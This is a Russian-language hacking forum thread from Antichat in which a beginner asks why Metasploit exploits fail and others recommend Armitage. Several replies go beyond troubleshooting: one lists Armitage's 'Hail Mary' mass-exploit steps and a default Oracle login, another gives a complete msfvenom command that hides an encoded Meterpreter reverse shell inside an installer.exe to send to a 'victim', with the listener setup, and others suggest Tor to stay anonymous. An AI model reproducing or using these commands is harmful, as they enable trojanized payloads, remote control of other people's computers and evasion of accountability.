HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.05.2015, 20:59
0x777
Новичок
Регистрация: 09.05.2015
Сообщений: 26
С нами: 5797046

Репутация: 5
По умолчанию

недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает

вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
 
Ответить с цитированием

  #2  
Старый 15.05.2015, 21:08
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от 0x777  

недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
так бак трак или kali. Плюнь в лицо кто тебе сказал что бесплатная версия не работает. Думаю тут мало у кого есть 5000 на покупку его. метасплоит это лишь удобный запуск эксплоита.
 
Ответить с цитированием

  #3  
Старый 15.05.2015, 21:24
0x777
Новичок
Регистрация: 09.05.2015
Сообщений: 26
С нами: 5797046

Репутация: 5
По умолчанию

ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка )

но вот стал перед делемой штормить ли дальше метасплоит или делать ручками

мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает ((

вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
 
Ответить с цитированием

  #4  
Старый 19.05.2015, 12:58
dmn75
Познающий
Регистрация: 11.05.2015
Сообщений: 46
С нами: 5794166

Репутация: 1
По умолчанию

Цитата:
Сообщение от 0x777  

ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка )
но вот стал перед делемой штормить ли дальше метасплоит или делать ручками
мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает ((
вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
Все отлично работает на бесплатнной версии.

Надо просто прямые руки
 
Ответить с цитированием

  #5  
Старый 22.05.2015, 17:41
gosmir
Новичок
Регистрация: 14.05.2015
Сообщений: 3
С нами: 5789846

Репутация: 0
По умолчанию

Можешь на первое время (да и в целом) облегчить себе задачу - накатить GUI к Metasploit Framework+Nmap - Armitage.

Тогда весь процесс можно свести к следующему алгоритму:

0. Hosts -> Add hosts.

1. Scan.

2. Attacks -> Find Attacks.

3. Attacks ->Hail Mary

.SpoilerTarget" type="button">Spoiler
Если речь идет о обговоренном заранее пентесте, иначе использование этого модуля приведет к запуску всех подходящих эксплойтах из шага "2", что не очень хорошо в плане анонимности.
4. Смотрим результат.

Могу выложить с картиночками из личной практики. В принципе для того, чтобы потестить на устойчивость к паблику - этого хватит.

Так же здесь можно проверить на наличие всяких дефолтных учеток

.SpoilerTarget" type="button">Spoiler
а-ля lbacsys/lbacsys в Oracle Database.

Но это все ближе непосредственно к сетевым сервисам. Если тебя интересует web - то есть много других инструментов.
 
Ответить с цитированием

  #6  
Старый 26.05.2015, 09:33
soul reaver
Новичок
Регистрация: 25.05.2015
Сообщений: 1
С нами: 5774006

Репутация: 0
По умолчанию

Цитата:
Сообщение от 0x777  

недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
Дело действительно заключается в ровности рук, gosmir верное дело подсказал юзай Armitage он сильно упрощает и без того не сложный процесс.

З.Ы. Сам юзал его по началу когда столкнулся с подобной проблемой.
 
Ответить с цитированием

  #7  
Старый 09.06.2015, 21:41
chatanti
Новичок
Регистрация: 13.07.2011
Сообщений: 29
С нами: 7807286

Репутация: 0
По умолчанию

Господа, дабы не плодить тем, не подскажете по метерпретеру? Как-то мимо меня это прошло..

Есть ли возможность настройки/написания скрипта, который бы выполнялся для метепретера автоматически после бэкконекта? Предположим, я хочу запустить powershell скрипт с помощью команды shell. Или

вывести в консоль(в БД) инфу о системе(sysinfo)? А потом, допустим, создать директорию(mkdir) и перезагрузится? Т.е. хотелось бы оперировать именно командами метерпретерами с небольшой своей логикой. И все это автоматически.. Заранее спасибо.

ПС могу рассказать как юзать метерпретер через тор.
 
Ответить с цитированием

  #8  
Старый 23.11.2016, 00:39
Shadow Stream
Новичок
Регистрация: 19.11.2016
Сообщений: 7
С нами: 4990646

Репутация: 0
По умолчанию

Цитата:
Сообщение от 0x777  

недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
Перед тем как начать работу в Metasploit :

- надо разобраться в exploit ;

- проверить LHOST (прописать ifconfig );

- LPORT 8080 (443, 6666) порт очень важен ;

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe

отправить файл на VICTIM OS (жертва)

msfconsole

use exploit/multi/handler

set Payload windows/meteroreter/reverse_tcp

set LHOST
xxx.xxx.x.x

set LPORT 8080

exploit
 
Ответить с цитированием

  #9  
Старый 01.12.2016, 16:41
Vjubkmobr
Познающий
Регистрация: 31.08.2012
Сообщений: 32
С нами: 7209686

Репутация: 0
По умолчанию

Один и очень важный аспект это белый ip + tor, в локалке можно и так плющить)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.